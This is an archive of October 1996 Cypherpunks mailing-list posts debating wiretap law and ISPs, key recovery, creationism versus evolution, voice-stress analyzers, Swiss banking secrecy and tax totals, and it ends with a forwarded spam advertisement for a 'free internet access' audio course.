> Newtonian mechanics is "wrong".  Even an tiny velocity causes space-
> and time-dilation, even a vanishingly small mass distorts spacetime,
> and Heisenberg's principle applies to macroscopic objects too - it's
> just hard to detect these effects under the conditions we're used to.
> But you won't catch me using general relativity to calculate catapult
> ranges.
> 

Newtonian mechanics is not "wrong", just an obeservation of mechanical 
behavior at a macro level of abstraction. Newton built on Keppler's work, 
and Eienstein upon Newton's, each refining the other's observation 
towards the true nature of matter and it's behavior in this realm.

Eienstein was nothing more than a clever observer, and QED is workable 
bullshit based upon those operations. Ever wonder why we have fudge 
factors in our calculations? We don't why they work, they just do. This 
tells me we ain't home yet.

> Humans only have 2 kinds of colors receptors, so artists can mix
> colors and get seemingly new colors.  That doesn't mean that blue and
> yellow paint mixed together will reflect monochromatic green.  People
> who try to transfer images from one medium to another suddenly have to
> confront the more complicated reality.  Surely that doean't make my
> kindergarten art teacher irrational for telling me about color mixing.
> 
> Or maybe it does.  Excuse me, I need to find my crayons...
> 

MIxing too many metaphors. All is see is gray...:-)

...Paul





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Wed, 9 Oct 1996 17:15:11 +0800
To: Christian Claborne <cypherpunks@toad.com
Subject: Re: Govt wants to read your e-mail
In-Reply-To: <2.2.32.19961009043345.002e8ddc@cyberthought.com>
Message-ID: <v03007808ae8101f4c1cb@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:33 PM -0700 10/8/96, Christian Claborne wrote:
>In case you haven't heard....
>
>
>"AN ALLIANCE OF 11 SOFTWARE AND HARDWARE
>COMPANIES HAS JUST ANNOUNCED ITS FORMATION
>TO DEVELOP KEY-RECOVERY SOLUTIONS FOR
>ELECTRONIC ENCRYPTION, a crucial component of the
>Clinton administration's latest plan to loosen the export of

Avoiding the strong temptation to sarcastically thank you for letting us
know about this, let me make instead a non-sarcastic point:

Those who do not have the time or inclination to read the list and see what
is being discussed should avoid forwarding items to the list, especially if
these items come from news outlets, press releases, and sundry public
announcements.\

The list has enough traffic without people sending "have you seen this?"
things days or weeks after the event has been thoroughly discussed.

--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 9 Oct 1996 15:10:20 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: legality of wiretapping: a "key" distinction
In-Reply-To: <199610081924.MAA27994@netcom15.netcom.com>
Message-ID: <Pine.SUN.3.94.961008234026.4662B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 8 Oct 1996, Vladimir Z. Nuri wrote:

I wasn't going to post on this thread again till I read this:

> of course lack or presence of a response to anything I or anyone
> else says here is a pretty meaningless metric. but I was speculating
> that there might be some weaknesses in wiretap laws because it didn't
> seem like there had been a huge amount of attention focused on them
> based on what I've seen on this list-- relative to the *enormous*
> attention focused on ITAR case law, software patents (esp. crypto), etc.

Wait, a lack of response on this is a meaningless metric, yet a lack of
response on this list is enough for you to make a judgement about the
nature of weaknesses in wiretap law?  Meaningless or meaningful?  Which is
it?

I think medication time passed without notice at the "Nuri" residence.


> I fully agree that Bell has some really fringe ideas about the law,
> but it was Unicorn who grouped me in with Bell.

Uh, where was this exactly?  I think it was you who grouped yourself in
with Bell and then attributed the idea to me.

> > I
> >think that it's interesting and good that people are working on their own
> >theories of law apart from the traditional institutional ones.
> 
> for the record, that's something Bell is doing that Unicorn mistakenly
> attributed to me. I'm advocating challenging the laws not via anarchy
> or technical means but using the built-in
> mechanism to do so-- the appeals process.

When did I attribute anything of the kind to you?  All I did was quote
your "new direction" in wiretap case law intrepretation which is neither
new, a direction worth going in, nor good legal intrepretation.

> sounds like something Bell would do. no, I'm looking for weaknesses in
> wiretap law such that a seasoned lawyer might mount an actual legal
> case in trying to appeal to the supreme court and get a favorable decision
> that rules wiretapping in certain kinds of situations  illegal.

And we seasoned lawyers, three of us last I counted, told you that you
were an idiot for suggesting it.  I guess we hurt your feelings because
you turned around and asked for a "civilized" lawyer.  (Read: one who will
listen to your ranting).  You wanted a legal opinion, you got more than
one. Now go away.

> >The EFF's failure to work on your little project seems like it might be
> >caused by:
> 
> excuse me, this is not "my little project". I take no ownership of
> it at all. I post to fire off the neurons of others.

Try using your own next time.

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Wed, 9 Oct 1996 18:46:20 +0800
To: "Paul S. Penrod" <furballs@netcom.com>
Subject: [Noise] Re: Missionaries (was: "Mormon Asshole?" re: GAK)
Message-ID: <3.0b33.32.19961009000340.00bf73ac@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:08 PM 10/8/96 -0700, Paul S. Penrod wrote:

>On Tue, 8 Oct 1996, Stephen Humble wrote:

>> Biblical creationism is "wrong": there's ample evidence that the Earth
>> is *much* more than 6000 years old.  Yet lots of seemingly rational
>> people believe biblical creationism.
>> 
>
>The "evidence" is based upon the belief that such techniques as carbon 
>dating and statistical radio active half life bearing rocks give an 
>accurate measurement of time as we know it. Geologically speaking, we are 
>just pissing in the fan to see which way it blows and calling it good. 
>And, considering the number of text books and egos to be restrung if it 
>was ever conclusively proven wrong would be devastating to say the least to 
>the current crop of scientists.

I suggest you take your beliefs to talk.origins.  I am sure that there are
a great number of people who will be willing to explain just *WHY*
creationism is no longer accepted as a rational belief.  

The current line of thought in evolutionary science is not just a whim or
"pissing in the wind", it is based on WHAT WORKS.  Creationists have spent
alot of time making claims as to why the earth was created by God, but none
of them has come up with the slightest shread of EVIDENCE as to it actually
being done that way.  What passes for "Creation Science" is alot of
nitpicking about evolutionary theory.  (As if somehow "disproving"
evolution will somehow "prove" creationism.)  Most of the so-called
"proofs" for Creationism are based on ignorance of what evolutionary theory
actually consists of.

I suggest that you actually read the talk.origins FAQs.  They might teach
you something about real science instead of that pretend science you have
been getting at church.

As for what this whole thread has to do with crypto, i have no idea...
---
|  "Remember: You can't have BSDM without BSD." - alan@ctrl-alt-del.com  |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 9 Oct 1996 18:58:27 +0800
To: Eric Murray <ericm@lne.com>
Subject: Re: Anonymous E-mail
Message-ID: <199610090724.AAA14561@dfw-ix10.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:26 PM 10/8/96 -0700, Eric Murray <ericm@lne.com> wrote:
>someone with slightly less scruples than I, and a little more time, and
>their own domain name & server, might consider writing a small
>program to create a few thousand accounts.  Then sign them up with PINmail.
>Every email address that's registered to PINmail gets you $5, right?

Netscape didn't find www.PINmail.com for me, but I assume that it
probably costs money to sign up for pinmail.  If it's even $6,
you won't win by creating a few thousand accounts for the $5 commission :-)

> [privacy risks] 

Of course, anywhere you have a concentration of email,
especially where there's bait like a promise of privacy, you have
to wonder about security risks.  Besides PINmail, there's
www.mailmasher.com (which has a strong privacy policy),
www.hotmail.com (which wants more information and may do
advertising or something), and there are the big services like AOL,
Compu$erve, and Prodigy.  What would happen if Sameer and Lance gave in to
the Dark Side?   What would happen if ATTMail were taken over by TPC?
Risks happen - deal with it.

                                Darth


....
(OK, so nobody but AT&T ever really used ATTMail :-)  We still
own the Death Star.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk
  Imagine if three million people voted for somebody they _knew_,
  and the politicians had to count them all.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Wed, 9 Oct 1996 19:22:31 +0800
To: craigw@dg.ce.com.au
Subject: Re: Missionaries (was: "Mormon Asshole?" re: GAK)
In-Reply-To: <199610082308.JAA23683@mac.ce.com.au>
Message-ID: <325B57E0.6847@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


craigw@dg.ce.com.au wrote:
> Most ppl believe what they are told to believe. Otherwise why would
> there be so many ppl willing to take whatever the Govt servers them.
> Afterall...The madia would not lie...;)

One example of a topic that most people (including very intelligent, 
"technical" people) steer clear of:

Why is it that 95-plus percent of all people stay with their parents' 
religion (more-or-less) when they grow up, instead of abandoning it, or 
finding one on their own?  Simple.  The uncountable zillions of "bytes" 
of information that go into your brain before you become more-or-less 
conscious, so controls your mind by the time you are conscious, that 
very few people can overcome this programming to any significant extent.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Wed, 9 Oct 1996 19:21:19 +0800
To: cypherpunks@toad.com
Subject: IRE founder Doug Kozlay [NEWS]
Message-ID: <325B5B1D.141D@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


The L.A. Times has run at least 3 major (full- or nearly-full-page) 
articles on encryption subjects in the last 4 or 5 working days.

Tuesday's (8 Oct) article concerns Doug Kozlay, a "former" researcher 
for NSA.  A few excerpts:

"Not a dollar (of 2 trillion in govt. payments) goes through unless the 
electronic key Kozlay invented turns in an electronic lock..."

"He (Kozlay) envisions future consumers using electronic cash cards with 
all the anonymity and easy spending of paper money."

"All the new devices he imagines would be protected by IRE's encryption 
technology."

The article goes on to describe how could standardize encryption all 
across the Internet.  IRE has a current contract to encrypt MCI's 
Internet access service, for $12 million.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul S. Penrod" <furballs@netcom.com>
Date: Wed, 9 Oct 1996 19:54:26 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re: [Noise] Re: Missionaries (was: "Mormon Asshole?" re: GAK)
In-Reply-To: <3.0b33.32.19961009000340.00bf73ac@mail.teleport.com>
Message-ID: <Pine.3.89.9610090030.A10891-0100000@netcom>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 9 Oct 1996, Alan Olsen wrote:

> At 11:08 PM 10/8/96 -0700, Paul S. Penrod wrote:
> 
> >On Tue, 8 Oct 1996, Stephen Humble wrote:
> 
> >> Biblical creationism is "wrong": there's ample evidence that the Earth
> >> is *much* more than 6000 years old.  Yet lots of seemingly rational
> >> people believe biblical creationism.
> >> 
> >
> >The "evidence" is based upon the belief that such techniques as carbon 
> >dating and statistical radio active half life bearing rocks give an 
> >accurate measurement of time as we know it. Geologically speaking, we are 
> >just pissing in the fan to see which way it blows and calling it good. 
> >And, considering the number of text books and egos to be restrung if it 
> >was ever conclusively proven wrong would be devastating to say the least to 
> >the current crop of scientists.
> 
> I suggest you take your beliefs to talk.origins.  I am sure that there are
> a great number of people who will be willing to explain just *WHY*
> creationism is no longer accepted as a rational belief.  
> 
> The current line of thought in evolutionary science is not just a whim or
> "pissing in the wind", it is based on WHAT WORKS.  Creationists have spent
> alot of time making claims as to why the earth was created by God, but none
> of them has come up with the slightest shread of EVIDENCE as to it actually
> being done that way.  What passes for "Creation Science" is alot of
> nitpicking about evolutionary theory.  (As if somehow "disproving"
> evolution will somehow "prove" creationism.)  Most of the so-called
> "proofs" for Creationism are based on ignorance of what evolutionary theory
> actually consists of.
> 
> I suggest that you actually read the talk.origins FAQs.  They might teach
> you something about real science instead of that pretend science you have
> been getting at church.
> 
> As for what this whole thread has to do with crypto, i have no idea...
> ---

I suggest you RTFM again. It was a commentary on the sad state of 
scientific practice as germain to today's egomanical pirannah who inhabit 
the domain of the "scientist". To publish is to exist, and the first rule 
is "draw your curves, then plot your points." The second is "Thou shalt 
not critisize your mentor."

Save the anti-religion rhetoric for someone who gives a damn.

...Paul





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 9 Oct 1996 17:46:04 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Creative Wiretap Arguments [Was :Re: Put up or shut up]
In-Reply-To: <199610082336.QAA24221@mail.pacifier.com>
Message-ID: <Pine.SUN.3.94.961009010443.4662E-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 8 Oct 1996, jim bell wrote:

> At 06:45 PM 10/6/96 -0700, Steve Schear wrote:
> >Using, as you say, out-of-the-shower ideas to re-argue settled caselaw are
> >almost always fruitless.  Since the intents of the ranters are generally
> >anarchistic, why even involve the law and justice. Even if their ideas have
> >good philosophical basis there is little hope for the broad changes they
> >seek in the political or legal landscape (given the powerful and selfish
> >interests of those inside and outside the beltway) without a great trauma
> >to the system.  
> 
> Maybe you're missing the point?  Even if you accept the idea of wiretapping 
> telephone lines, one of the things that _isn't_ settled is how law is going 
> to start treating ISP's.  That, let me point out, IS NOT settled law, and in 
> fact it hasn't really even started, so those lawyers who have a knee-jerk 
> tendency to accept precedent don't have any precedent to accept!  (unless, 
> of course, they "pre-accept" the assumption that what the government can do 
> WRT ISP's is somehow identical to what they do with telephones.)

I disagree.  There is lots of potential precident.  The entire concept
that data voluntarily turned over to a 3rd party is not entitled to 4th
amendment protection (i.e., pen registers) is just the one that happens to
jump to mind.  The fact that the government has had to deal with
the breakup of ma bell and cooperate with several different phone
companies now suggests to me that not much of a leap is required to
include ISPs.  Constitutional arguments that ISPs are somehow different
from phone companies and therefore not required to comply with wiretap
orders?  Good luck.

I know its fun to make the argument that ISPs and E-mail and NetPhone are
all new technologies and so it must be unconstitutional to regulate them
but the amusement in these cases stems from a wish that it was so, not
fact or reason.

Are there some flexibilities in the developing law?  Yes.  Are they going
to make all e-mail and electronic communications legally untapable and
immune from electronic search warrant?  Of course not.  Don't be stupid.
This is what technology is for.

> I see two broad and conflicting ideas of what the government can do in a 
> search. The first is a classic search warrant, which simply allows the cops 
> to go in and look around, for a comparatively limited amount of time, 
> informing the person searched,taking a few things, and then _leaving_.  
> Period.  Generally, they can't sneak in, they can't hide in the closet for 
> weeks or months, etc.
> 
> Without effective challenge by telephone companies (which have no motivation 
> to challenge it) there has been a very different precedent set, that of the 
> wiretap:  No informing the target at the beginning, indefinite time limit, 
> and not necessarily even informing those tapped after it's over.  _VERY_ 
> different.
> 
> The question is, which of these precedents should control ISPs?  Police, 
> obviously enough, would probably want to insinuate into the game with the 
> assumption that the latter scenario rules.  After all, they're talking about 
> wires and electricity, right?  That sure sounds like wiretapping, right?

Why bother with all this trash?  Use SSH and end to end encryption.  End
of discussion.  See how much simpler and cheaper that is than trying to
get the supreme court to kneecap the police and the feds?  Hint: If you
don't, you're on the wrong list.

> I contend that an ISP should be entitled to enter into a contract with his 
> customers in a way which obligates him to structure his business to minimize 
> his ability to cooperate with police when given a search warrant.

"I content that a phone company should be entitled to enter into a
contract with his customers in a way which obligates him to structure his
business to minimize his ability to cooperate with police when given a
search warrant."  Yeah.  Good luck.  Switch phone comapny with "deli" or
with "employer" or with "interstate shipper."  Same result.  "Good luck." 
Find me a General Counsel who would let their firm do that and I'll find
you a wonderful canidate for a malpractice suit.  I would suggest you
study the contractual doctrine of "Illegality" and state statutes on
"Obstruction of Justice."

> One 
> example which occurred to be months ago (which, amazingly, shut up even 
> Black Unicorn!) was that the ISP could agree to encrypt any email received 
> with the user's public key (or another public key whose private key is known 
> only to the user) so that useful information is only ephemerally available 
> in the ISP's computers.  A few seconds after it arrives, it's been encrypted 
> and is "gone" from the standpoint of the ISP.  Only the user, when he logs 
> in and after he downloads the encrypted files, can decrypt them.

Why even involve the ISP?  Why would an ISP want to do this and expose
themselves to potential liability when the end user could just do it
themselves?  I don't remember this point, but if I ignored it it's
probably because its just lacking in any remarkable insight.  Actually it
doesn't even seem to have undergone the scrutiny of 10 minutes
consideration.

The entire advantage of encryption is that it moves the burden and ability
to protect communications to the end user.  There is no need to depend on
the phone company, an ISP, or anyone else but the person with whom you are
communicating.

If you want an ISP to encrypt all your mail as it shows up (a strange
request to begin with because of the potential for some third party to
encrypt with the wrong key or etc. and destroy the data permanently) you
are introducing a third party into the equation which you now have to
trust and depend on as far as resistence to government coercion goes.
(You seem to have identified this problem below, but in a way that
suggests it just occured to you or that this is just a stream of
consciousness blathering post).  I don't understand at all how this leaves
anyone better off.  I can point out explicitly, however, how it leaves
everyone worse off.

1. The government now has another party to squeeze (The ISP, who would
have been fairly untouchable if they had done nothing but forward e-mail).

2. The party receiving mail now has to depend on the ISP and some method
of contractual enforcement if the ISP breaks its word.  (I suppose this is
where it will be suggested that we just kill all the ISP employees).

3. The party sending mail now has to rely on the discression of the ISP
(From whom he/she has no contractual assurances at all).

> But that raises another question.  Suppose the government, not liking this 
> situation, decides to not merely do a search, but in fact order the ISP to 
> turn off the encrypt-on-receipt feature?  And more particularly, to do so 
> without telling the customer?  What if, in fact, they order the ISP to LIE 
> about this?  Or what if they order the ISP to change his system's software 
> to store away an unencrypted version of the messages so as to bypass this 
> protection?

What if they just packet sniff at the "In" plug of the ISP and cut the ISP
out all together?  Why bother telling the ISP anything if it's clearly not
being compliant?  Duh.  Same reason I would send agents to go around an
island bank which was not cooperating were I the IRS.  Of course, the ISP
could easily be charged in a conspiracy and obstruction action after this.

> My answer to all this should be obvious:  There is a vast difference between 
> doing a "search" and, in effect, turning an ISP into a slave who has to say 
> "how high?"  when the government says "jump."  Arguably the ISP has to 
> consent to a search;

Where do you get this last part?  Arguably in the Jim Bell Court of
Invented Appeals perhaps.  Of course in that court the death penality
applies for parking violations if the complaintant is rich enough.

> I don't think he has to change his business practices 
> in order to make those searches more useful.  And I think he's entitled to 
> make promises to his customers that he's obligated to keep, even when the 
> government would want him to break them.

I refer you back to the concepts of "obstruction" and "conspiracy."
 
> However, I won't claim that this matter has been settled; in fact, it's 
> probably an issue that never came up before, in any court.

Neither has the argument that cows fly and therefore should be regulated
by the FAA.  How that lends the argument any merit at all is beyond my
comprehension.

> That's why I 
> think it's important to ensure that ISP-law does not follow is the bad 
> precedents set by wiretap law.  

Suggestion:  Start a foundation with this goal.  Let me know how far you
get.  Try calling some law schools and asking them if they might have some
students willing to work on the problem for free.

> 
> Jim Bell
> jimbell@pacifier.com
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vin@shore.net (Vin McLellan)
Date: Wed, 9 Oct 1996 19:23:06 +0800
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: Voice Stress Analysis of Debates?
Message-ID: <v02130511ae80cb8ea1a6@[198.115.177.224]>
MIME-Version: 1.0
Content-Type: text/plain


        Jim Bell queried the List about potential AP decision-support tools
like voice-stress detectors which could identify truth-tellers among
politicians and other possible candidates for Mr. Bell's much-debated
proposal to cleanse the body politic.   One anon C'punker responded with a
fine terse summary of VS/PSE tech (along with the surprising news that
VS/PSE chips are now available at $89.95 per.)   Another, Sandy Sandfort,
noted:

>The original device was the PSE, the psychological stress
>evaluator.  It was, as still is, sold by a company called
>Dektor.  It is located in the DC area (Maryland?) and is run
>by a group of ex-spooks.  It's been around for 25 years or so.

        Dektor Counterintelligence is located in Savannah, Ga.

        The Dektor PSE was developed by Col. Allan Bell (USA, ret.) shortly
after he retired from the Army, where -- towards the end of a long career
which included, as I recall, a stint in charge of the MI detachment in West
Berlin -- he had played "Q," the inventive spy-supply wizard, at the US
Army military intelligence headquarters.

        Dektor's PSE came into some prominence after Col. Bell, then a
civilian,  showed up with his black box to assist Italian police during
their huge investigation of the kidnapping of US Army General James Dozier
by the Red Brigades in '82.  The fact that Dozier was located and rescued
by the Carabinieri commandos after five weeks in captivity -- while Prime
Minister Aldo Moro had been murdered by the Red Brigades, eight weeks after
his kidnapping in '78 -- led inevitably to stories, probably mythical, that
Bell's PSE was a significant factor in the investigation.  As Clarke or
someone said, any technology sufficiently advanced will be considered magic
-- and it is doubtless true that, for many Italians interviewed during the
Drozier inquiry, the quiet presence of the diminutive American civilian,
with his utterly mysterious "truth-detector," inspired fear and awe.

        The Legend that came out of Italy was doubtless a factor in
Dektor's subsequent success selling the $5K PSE into the corporate and
security market.  (There was a period where corporate negotiations were
sometimes held in a hotel chosen only just before the start of the talks,
for fear that one party or the other might have pre-installed a PSE.)   In
the mid and late '80s, dozens, perhaps hundreds of PIs -- and maybe a few
journalists -- were actually running around using tape recorders to
interview people, then running back to their hotel rooms to spin the tape
for their PSE.

        All of this was something of a giggle for Allan Bell, a Cold
Warrior with a sense of humor who would _love_ this List.  Bell offered
(when asked) a much more modest description of the potential of the PSE.
As I recall, Bell described the PSE as tool which could allow an
investigator to identify, with reasonable certainty, the utterly innocent
(lumped together, perhaps, with the utter psychotic; those who couldn't
themselves separate truth from falsehood)... but which offered only limited
utility in sorting the liars from others of various types who might
experience stress or tension when faced with an interrogation or interview.


        The utterly innocent and the utterly psychotic both being
relatively uncommon breeds (even among politicians and/or Libertarians,)
the PSE never quite made it as a standard tool for criminal justice, or
journalistic, inquiries.

        Bell set up what I always believed to be an elaborate practical
joke on the Beltway Bandit Culture when, at the height of the PSE craze, he
let Dektor's sales office in suburban D.C. -- Vienna, maybe? -- be used
after-hours as the world headquarters/classroom/PR center for the
short-lived Mensa University.  (MU's president of which was a local PSE
distributor, and very much a true believer.)

        The idea that the very bright might have to be very honest to
matriculate intrigued me... but I'll admit I wasn't surprised when MU,
quite honestly, collapsed into something of a laughingstock.

        Suerte,

                        _Vin

         Vin McLellan +The Privacy Guild+ <vin@shore.net>
      53 Nichols St., Chelsea, Ma. 02150 USA Tel: (617) 884-5548
                         <*><*><*><*><*><*><*><*><*>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 9 Oct 1996 19:33:26 +0800
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: [NEWS] Crypto-relevant wire clippings
In-Reply-To: <Z5NHVD1w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.94.961009042131.4662H-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 8 Oct 1996, Dr.Dimitri Vulis KOTM wrote:

> Agence France Presse: Tuesday, October 1, 1996
> 
> Swiss Socialists Call for Abolition of Banking Secrecy
> 
> BERN-- Socialist members of the Swiss parliament tabled a motion calling for
> abolition of banking secrecy to combat tax evasion, on Tuesday.

I have been skeptical of Switzerland for quite some time publiclly on the 
list.  I continue to be so.  Switzerland has also signed a new Tax Treaty
with the United States which has some dire consequences for banking
secrecy.  Avoid Switzerland.


--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 9 Oct 1996 22:59:33 +0800
To: Julian Assange <proff@suburbia.net>
Subject: Re: Government Denial of Service Attacks
Message-ID: <3.0b19.32.19961009061541.00d23c48@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:33 AM 10/9/96 +1000, Julian Assange wrote:
>I will not coment on the correctness of the U.S government's funding
>allocations, however the above statement is clearly designed to be
>deceptive. Given the GDP of the U.S as a whole during fiscal 1996 was
>greater than that of any other country at any other time, including the
>U.S in previous years (the U.S like most other countries has postive
>growth), of course the absolute value of taxes collected will be larger.

I make the point only because this very important fact never occurs to
anyone.  Our rulers like to say that they can't make do with a cent less of
the vast sums they collect from us and, in fact, all of them say that they
will need more.  

Just pointing out that with all they have, they can probably stand to cut
back a little.  The Fortune 500 did.

DCF  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: craigw@dg.ce.com.au
Date: Wed, 9 Oct 1996 12:10:21 +0800
To: deeb@x.org
Subject: Re: Missionaries (was: "Mormon Asshole?" re: GAK)
Message-ID: <199610082308.JAA23683@mac.ce.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Most ppl believe what they are told to believe. Otherwise why would 
there be so many ppl willing to take whatever the Govt servers them.
Afterall...The madia would not lie...;)
> attila <attila@primenet.com> sez:
> > why would any rational individual espouse ANY cause he thought was
> > wrong!

        ,'~``.              \|/              ,'``~.
        (-o=o-)            (@ @)            ,(-o=o-),
+--.oooO--(_)--Ooo-----oOO-(_)-OOo-------oooO--(_)--Oooo.------+
|                                                              |
|   Soon, we may all be staring at our computers, wondering    |
|               whether they're staring back.                  |
|                                                              |
| [Network Admin For WPA Business Products.  aka doshai >;-) ] |
|    .oooO        http://pip.com.au/~doshai/      Oooo.        |
|    (   )   Oooo.                        .oooO   (   )        |
+-----\ (----(   )-------oooO-Oooo--------(   )--- ) /---------+
       \_)    ) /                          \ (    (_/
             (_/                            \_)
Key fingerprint = 2D F4 54 BB B4 EA F1 E7  B6 DE 48 92 FC 8D FF 49
Send a message with the subject "send pgp-key" for a copy of my key.
(if I want to give it to you)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Wed, 9 Oct 1996 14:57:08 +0800
To: frissell@panix.com (Duncan Frissell)
Subject: Re: Government Denial of Service Attacks
In-Reply-To: <3.0b19.32.19961008154059.00a26358@panix.com>
Message-ID: <199610082333.JAA27903@suburbia.net>
MIME-Version: 1.0
Content-Type: text


> "During Fiscal 1996, the Government of the United States collected more
> taxes from the American people than any government had ever collected
> before in the history of mankind.  During Fiscal 1997, the Government of
> the United States plans to collect more taxes from the American people than
> any government has ever collected before in the history of mankind.  And
> still it's not enough."      
> 

I will not coment on the correctness of the U.S government's funding
allocations, however the above statement is clearly designed to be
deceptive. Given the GDP of the U.S as a whole during fiscal 1996 was
greater than that of any other country at any other time, including the
U.S in previous years (the U.S like most other countries has postive
growth), of course the absolute value of taxes collected will be larger.

-- 
"Of all tyrannies a tyranny sincerely  exercised for the good of its victims  
 may be the most  oppressive.  It may be better to live under  robber barons  
 than  under  omnipotent  moral busybodies,  The robber baron's  cruelty may  
 sometimes sleep,  his cupidity may at some point be satiated; but those who  
 torment us for own good  will torment us  without end,  for they do so with 
 the approval of their own conscience."    -   C.S. Lewis, _God in the Dock_ 
+---------------------+--------------------+----------------------------------+
|Julian Assange RSO   | PO Box 2031 BARKER | Secret Analytic Guy Union        |
|proff@suburbia.net   | VIC 3122 AUSTRALIA | finger for PGP key hash ID =     |
|proff@gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 |
+---------------------+--------------------+----------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew Sheppard <Matthew.Sheppard@Comp.VUW.AC.NZ>
Date: Wed, 9 Oct 1996 18:58:13 +0800
To: cypherpunks@toad.com
Subject: another MMF?
Message-ID: <199610090000.NAA08092@rialto.comp.vuw.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


A friend of mine got this in the mail, pretty sure the from addr is
broken. The Audio Tape will be a must for cpunk parties.

------- Start of forwarded message -------
From: Lsat@Lsat.com
Date: Tue, 08 Oct 1996 03:04:16 PDT
Subject: Your ACCOUNT...

ARE YOU NUTS??????  Your provider for Internet Services is ripping you OFF!  The Internet 
was designed to be FREE!! PLEASE PLEASE let us show you where/how you can get it 
free!  Please Read Below.

JUST FOR READING THIS YOU WILL GET A FREE EMAIL ACCOUNT!!!!!!
- ---------------------------------------------------------------------------------------------------------------------------------------
NEVER EVER pay for Internet Access AGAIN!!! E-V-E-R!

This Amazing Course on Audio Tape teaches you STEP by STEP your Internet Service 
Provider 1doesn't want you to know!

* How to get FREE DIAL-UP PPP Internet Access!
* How to Surf the Web,Newsgroups,and EMAIL Anonymously/Untraceable!
* Where you can get FREE Email Remailing!
* Where you can get FREE Email Addresses!
* Where you can get FREE Access to SMTP (Outgoing email)!
* Where you can get FREE Access to News Servers!
* Where you can get FREE Web Pages!
* How to get FREE Internet Tools for Email, News, WWW, Etc.!
* How to get free accounts on BBS's!
* How to Manipulate your IP Address!
* MUCH MUCH More!!!

No matter where you live we guarantee you will get FREE internet  access legally and 
anonymously!

O N L Y ------>  $24.95 Delivered (WORLDWIDE) Act NOW supplies are in Limited Supply! 
FAST SERVICE!!!
- -----------------------------------------------------------------------------------------------------------------------------------------------
 BONUS  BONUS  BONUS  BONUS  BONUS  BONUS  BONUS  BONUS  BONUS  BONUS 

As an added BONUS!  We will show you how you can make phone calls that are not 
traceable back to you - 100% Legal!  Very handy for those important calls you don't 
want anyone to find out about! But you absolutely M U S T respond within 10 DAYS

   A  N  D

IF you respond within 10 days we will include a FREE EMAIL ACCOUNT in your 
selected name!  Full Details and password will be included

 BONUS  BONUS  BONUS  BONUS  BONUS  BONUS  BONUS  BONUS  BONUS  BONUS
- ---------------------------------------------------------------------------------------------------------------------------------------------------
ORDER FORM - Print out and mail

                                                                              Price Each    Sub-Total

_____   Total # of Courses                                 24.95      ___________
    1     Free Email Account (Within 10 Days)    0.00              0.00 
                                           Handling (Email Only)              ___________
                                     Shipping (Add. courses +1.00)      ___________
                                    Sales Tax (CA residents 7.75%)     ___________

                                              Order total                    US $___________ 
PAYMENT BY:
___ Check ___ Money Order  - US FUNDS only!

LSAT Productions
PO Box 2747-453
Dept. E140A2-1007-1-1
Huntington Beach, CA  92648
USA

